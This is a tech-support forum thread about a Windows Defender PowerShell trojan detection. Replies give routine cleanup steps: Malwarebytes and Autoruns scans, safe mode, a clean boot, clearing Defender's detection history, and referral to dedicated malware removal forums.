Microsoft Defender Detects powershell trojan

Scan your PC with the free version of Malwarebytes.

https://www.malwarebytes.com/

If Malwarebytes doesn't clean things up then download Autoruns.

Right click on autoruns.exe and Run as Administrator.

When it has finished scanning, go to File -> Save and save the log.arn file, then zip the log and share it via OneDrive or any cloud file sharing service. Post the link to the log file and I'll analyze it for you.

https://live.sysinternals.com/Autoruns.exe

Hi CarterBurke1 -

I'm Kevin B. Independent advisor and a Windows user like you. I do apologize for the inconvenience that you experiencing right now, let me help you sort things out.

Are there any recent changes made on the computer before the issue starts?

Kindly follow the steps below and check if it will resolve the issue.

Boot your computer in safemode. Safemode is a windows environment used to troubleshoot, diagnose and repair corrupted windows system files. While computer is in safemode, no 3rd party application will run, not even your anti-virus, and selected services needed by windows to boot are the only running service on the computer. This ensures us that the computer will only use applications and services at a minimal level to avoid 3rd party conflicting application and services.

Please click on the link below and follow the steps in booting your computer in safemode.

https://support.microsoft.com/en-us/windows/sta...

Once in safemode, your can run a scan using your Anti-Malware scanner or your can use the Microsoft Safety Scanner just to make sure that computer doesn't have any threats.

Click on the link below to access Microsoft Safety scanner

https://docs.microsoft.com/en-us/windows/securi...

Once scan is done, please run a system file checker on your computer to check the integrity of the system files of windows on your computer.

Click then link below and follow the steps on how to perform system file checker on your computer

https://support.microsoft.com/en-us/topic/use-t...

After the scan, please perform cleanboot on computer.

Perform Clean Boot
- This process will eliminate 3rd party application running in the background of your computer along with services that are not needed to run windows. If there's any conflicting 3rd party application that causes the issue on your computer, this process will stop it.

1. Open the run box by pressing the Windows Key + R and type msconfig
2. System Configuration Utility box will open and by default you are on general tab.
3. On the General tab, click the selective startup and make sure that load system service and load startup items both have checked mark.
4. Click on services tab
5. Put a check mark on Hide All Microsoft Services > This is a very important part as if you miss to click on this, computer might not boot properly or permanently and will end up on clean installation.
6. Once Hide all Microsoft Services have checked mark on it, click on Disable All
7. Click on the Startup Tab and click open task manager. This will open another window which contains all your startup applications on the administrator account.
8. Disable all application that you're not using. You can simply just click on them and select disable.
9. Click OK , Apply and close the configuration utility

After the cleanboot, please try to delete temporary files on your computer to make sure that the threats are not using the temporary files on your computer.

https://support.microsoft.com/en-us/windows/dis...

Restart your computer normally

Hope this will help and have a bless day!

Thanks.
Kevin B.
Independent advisor

Hi Carter,

If you display Protection History in Defender, do you see the "notification" of a Trojan?

If you do, and neither MalwareBytes nor the Microsoft Safety Scanner detect the Trojan,

but Defender continues to detect it, it is probably a False positive.

Defender has the propensity to "detect" items that it has already remediated, but left a

copy of its "notification", in Detection History. That is why the other scanners do not

detect it. If this is your case, you can eliminate the Alerts that Defender is presenting,

by deleting the Detection History folder.

This procedure is perfectly safe. Windows rebuilds the the Detection History folder, the

next time that it needs it.

This link provides the instructions for deleting the folder. Disregard the reference to PUPs.

This situation applies to other malware as well.

https://answers.microsoft.com/en-us/protect/forum/all/windows-defender-identifies-the-same-pup-as-a/63f17794-3815-4784-b9cd-c6059c8e0828

Good luck, Glen

did that, and it still detects it

Provide an autoruns log as detailed in my previous reply.

https://drive.google.com/file/d/1LLXgIkW8ad57tPJj9FrAx4Mvz5yjfxOu/view?usp=sharing here you go

Thanks for the log, unfortunately it's not showing anything suspicious.

If it's still detected after removing from protection history and a full scan is not finding anything, it may be worth posting in a dedicated malware removal forum.

https://forums.malwarebytes.com/forum/7-windows-malware-removal-help-support/

https://www.bleepingcomputer.com/forums/f/22/virus-trojan-spyware-and-malware-removal-help/